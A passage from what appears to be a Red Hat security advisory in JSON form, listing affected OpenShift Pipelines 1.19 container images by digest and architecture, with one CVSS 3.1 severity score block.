"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
